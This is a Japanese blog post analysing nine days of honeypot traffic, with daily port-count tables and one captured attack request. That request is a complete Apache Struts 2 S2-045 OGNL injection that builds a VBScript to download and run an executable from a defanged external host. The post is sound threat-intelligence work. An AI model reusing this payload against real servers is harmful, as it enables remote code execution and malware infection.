ハニーポット簡易分析(43-51日目:9/20-9/29)
かなり更新が止まってしまいましたが、Honeytrap の簡易分析となります。
ポート別に見てみると、445ポート宛の通信が非常に多い割合です。通信内容としては調査行為止まりですが、未だに攻撃に利用されているポートの一つとなっています。
ポート22, 3389,8080の主要ポートに続き、IoT製品を狙ったポート52869(D-Linkなど)も多く観測されています。
◾️9/20 - 9/29 における宛先別ポート(80ポートを除く)
◾️宛先ポート別の割合
9/20 3,882 件
ポート | 件数 | 割合 | サービス |
445 | 1,814 | 46.73% | SMB |
22 | 152 | 3.92% | SSH |
3389 | 121 | 3.12% | RDP |
1433 | 73 | 1.88% | Microsoft SQL Server |
5555 | 54 | 1.39% | Android Debug Bridge |
8080 | 41 | 1.06% | PROXY |
6379 | 38 | 0.98% | Redis |
4567 | 33 | 0.85% | ? |
1194 | 30 | 0.77% | OpenVPN |
995 | 30 | 0.77% | POP3-SSL |
9/21 4,258 件
ポート | 件数 | 割合 | サービス |
445 | 1,795 | 42.16% | SMB |
22 | 213 | 5.00% | SSH |
8080 | 121 | 2.84% | PROXY |
6379 | 91 | 2.14% | Redis |
3389 | 82 | 1.93% | RDP |
2222 | 66 | 1.55% | SSH |
1433 | 63 | 1.48% | Microsoft SQL Server |
8180 | 49 | 1.15% | ? |
8081 | 38 | 0.89% | ? |
9200 | 34 | 0.80% | WSP |
9/22 4,234 件
ポート | 件数 | 割合 | サービス |
445 | 1,637 | 38.66% | SMB |
22 | 148 | 3.50% | SSH |
22222 | 117 | 2.76% | SSH |
8180 | 66 | 1.56% | ? |
8080 | 64 | 1.51% | PROXY |
1962 | 63 | 1.49% | BIAP-MP |
3389 | 59 | 1.39% | RDP |
1433 | 54 | 1.28% | Microsoft SQL Server |
47808 | 37 | 0.87% | bacnet |
81 | 37 | 0.87% | GoAhead Web Server |
9/23 5,555 件
ポート | 件数 | 割合 | サービス |
445 | 1,648 | 29.67% | SMB |
22 | 1,352 | 24.34% | SSH |
3389 | 99 | 1.78% | RDP |
1433 | 83 | 1.49% | Microsoft SQL Server |
8080 | 66 | 1.19% | PROXY |
10022 | 64 | 1.15% | ? |
5000 | 63 | 1.13% | UPnP |
52869 | 42 | 0.76% | D-Link, Realtek SDK |
2323 | 33 | 0.59% | TELNET |
28017 | 33 | 0.59% | ? |
9/24 5,120 件
ポート | 件数 | 割合 | サービス |
445 | 1,688 | 32.97% | SMB |
22 | 197 | 3.85% | SSH |
2222 | 72 | 1.41% | SSH |
3389 | 69 | 1.35% | RDP |
11022 | 64 | 1.25% | ? |
1433 | 55 | 1.07% | Microsoft SQL Server |
52869 | 43 | 0.84% | D-Link, Realtek SDK |
8080 | 40 | 0.78% | PROXY |
4899 | 35 | 0.68% | ? |
5555 | 33 | 0.64% | Android Debug Bridge |
9/25 5,864 件
ポート | 件数 | 割合 | サービス |
445 | 1,839 | 31.36% | SMB |
22 | 1,460 | 24.90% | SSH |
3389 | 99 | 1.69% | RDP |
222 | 88 | 1.50% | rsh-spx |
8022 | 72 | 1.23% | ? |
1433 | 67 | 1.14% | Microsoft SQL Server |
2222 | 58 | 0.99% | SSH |
8080 | 55 | 0.94% | PROXY |
5555 | 47 | 0.80% | Android Debug Bridge |
52869 | 34 | 0.58% | D-Link, Realtek SDK |
9/26 4,475 件
ポート | 件数 | 割合 | サービス |
445 | 1,858 | 41.52% | SMB |
503 | 192 | 4.29% | intrinsa |
3389 | 85 | 1.90% | RDP |
22 | 80 | 1.79% | SSH |
6379 | 70 | 1.56% | Redis |
2202 | 64 | 1.43% | SSH |
11022 | 64 | 1.43% | ? |
1433 | 63 | 1.41% | Microsoft SQL Server |
2222 | 39 | 0.87% | SSH |
8087 | 33 | 0.74% | ? |
9/27 4,241件
ポート | 件数 | 割合 | サービス |
445 | 1,857 | 43.79% | SMB |
33789 | 464 | 10.94% | ? |
22 | 162 | 3.82% | SSH |
222 | 96 | 2.26% | SSH |
8022 | 95 | 2.24% | ? |
2222 | 89 | 2.10% | SSH |
3389 | 61 | 1.44% | RDP |
1433 | 45 | 1.06% | Microsoft SQL Server |
6379 | 43 | 1.01% | Redis |
52869 | 40 | 0.94% | D-Link, Realtek SDK |
9/28 5,569件
ポート | 件数 | 割合 | サービス |
445 | 1,773 | 31.84% | SMB |
2202 | 218 | 3.91% | SSH |
22 | 119 | 2.14% | SSH |
3389 | 96 | 1.72% | RDP |
8022 | 81 | 1.45% | ? |
2222 | 72 | 1.29% | SSH |
6379 | 62 | 1.11% | Redis |
222 | 57 | 1.02% | SSH |
52869 | 57 | 1.02% | D-Link, Realtek SDK |
8080 | 54 | 0.97% | PROXY |
9/29 7,976件
ポート | 件数 | 割合 | サービス |
445 | 1,656 | 20.76% | SMB |
6379 | 271 | 3.40% | Redis |
22 | 188 | 2.36% | SSH |
3389 | 137 | 1.72% | RDP |
2222 | 129 | 1.62% | SSH |
222 | 102 | 1.28% | SSH |
8022 | 90 | 1.13% | ? |
8080 | 86 | 1.08% | PROXY |
1433 | 64 | 0.80% | Microsoft SQL Server |
8834 | 34 | 0.43% | ? |
◾️マルウェアダウンロード先
マルウェアについては傾向は大きく変更はありませんでした。いくつか解析していないURLもあることから、攻撃者側もダウンロード先を変更しているように思われます。
<気になった通信>
Apache Struts 2 の脆弱性 (S2-045) を狙った通信ですが、かなり複雑なコマンドになっています。ダウンロードのファイルの詳細までは確認していませんが、IoT系のマルウェアやマイナー系のルールではないと思われます。
GET /struts2-rest-showcase/orders.xhtml
Content-Type: %{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):*1.(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='cmd /c del C:/Windows/temp/appveif.vbs&echo Set Post = CreateObject("Msxml2.XMLHTTP") >>C:/Windows/temp/appveif.vbs&echo Set Shell = CreateObject("Wscript.Shell") >>C:/Windows/temp/appveif.vbs&echo Post.Open "GET","hxxp://a46[.]bulehero[.]in/download[.]exe",0 >>C:/Windows/temp/appveif.vbs&echo Post.Send() >>C:/Windows/temp/appveif.vbs&echo Set aGet = CreateObject("ADODB.Stream") >>C:/Windows/temp/appveif.vbs&echo aGet.Mode = 3 >>C:/Windows/temp/appveif.vbs&echo aGet.Type = 1 >>C:/Windows/temp/appveif.vbs&echo aGet.Open() >>C:/Windows/temp/appveif.vbs&echo aGet.Write(Post.responseBody) >>C:/Windows/temp/appveif.vbs&echo aGet.SaveToFile "C:/Windows/temp/appveif.exe",2 >>C:/Windows/temp/appveif.vbs&echo wscript.sleep 10000>>C:/Windows/temp/appveif.vbs&echo Shell.Run ("C:/Windows/temp/appveif.exe")>>C:/Windows/temp/appveif.vbs&C:/Windows/temp/appveif.vbs').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
マルウェアURL先: https://www.virustotal.com/#/file/452fec0a680e9f11334e75a0ad8f7f2b837676f08303d935b5ad188f218dcd8b/detection
他にも気になる通信はあったので、ちょくちょくとブログに書いていこうと思います。
簡易分析は以上となります。
*1:#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class